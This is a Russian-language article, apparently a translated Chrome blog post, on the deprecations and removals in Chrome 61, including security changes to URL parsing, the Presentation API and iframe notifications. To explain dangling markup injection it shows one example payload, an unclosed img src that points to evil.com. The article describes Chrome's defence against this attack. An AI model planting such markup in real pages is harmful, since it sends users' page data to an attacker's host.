Почти в каждой версии Chrome мы видим значительное количество обновлений и улучшений продукта, его производительности, а также возможностей веб-платформы. В этой статье описаны устаревания и удаления в Chrome 61, бета-версия которого доступна с 3 августа. Этот список может быть изменен в любое время.
Безопасность и конфиденциальность
Блокировать ресурсы, URL-адреса которых содержат символы «\n» и «<».
Существует тип взлома, называемый внедрением висячей разметки, при котором усеченный URL-адрес используется для отправки данных во внешнюю конечную точку. Например, рассмотрим страницу, содержащую <img src='https://evil.com/? . Поскольку URL-адрес не имеет закрывающей кавычки, браузеры будут читать следующую кавычку и обрабатывать заключенные в нее символы так, как если бы это был один URL-адрес.
Chrome 61 смягчает эту уязвимость, ограничивая наборы символов, разрешенные в атрибутах href и src . В частности, Chrome прекратит обработку URL-адресов, если встретит символы новой строки ( \n ) и меньше символов ( < ).
Разработчики, у которых есть законный вариант использования новой строки и меньше символов в URL-адресе, должны вместо этого избегать этих символов.
Намерение удалить | Трекер Chromestatus | Ошибка хрома
Устареть и удалить Presentation API в небезопасных контекстах.
Было обнаружено, что в небезопасных источниках API Presentation можно использовать в качестве вектора взлома для небезопасных источников. Поскольку на дисплеях нет адресной строки, API можно использовать для подделки контента. Также возможно извлечь данные из запущенной презентации.
В соответствии с намерением Blink удалить мощные функции в небезопасных источниках мы планируем прекратить поддержку Presentation API в небезопасных контекстах. Начиная с Chrome 61, PresentationRequest.start() больше не будет работать в небезопасных источниках.
Намерение удалить | Трекер Chromestatus | Ошибка хрома
JavaScript
Запретить определение индексированных свойств в окнах
Ранее некоторые браузеры допускали такие назначения JavaScript, как следующие:
window[0] = 1;
Текущая спецификация HTML отмечает , что это явное нарушение спецификации JavaScript. Таким образом, эта возможность удалена в Chrome 61. По состоянию на февраль 2016 года Firefox уже соответствует требованиям.
Удалить использование уведомлений из небезопасных iframe
Запросы разрешений от iframe могут сбить с толку пользователей, поскольку трудно отличить происхождение содержащей страницы от источника iframe, отправляющего запрос. Когда объем запросов неясен, пользователям трудно решить, предоставить или отклонить разрешение.
Запрет уведомлений в iframe также приведет в соответствие требования к разрешению уведомлений с требованиями к push-уведомлениям, что упростит работу разработчиков.
Разработчики, которым нужна эта функция, могут открыть новое окно и запросить разрешение на уведомление.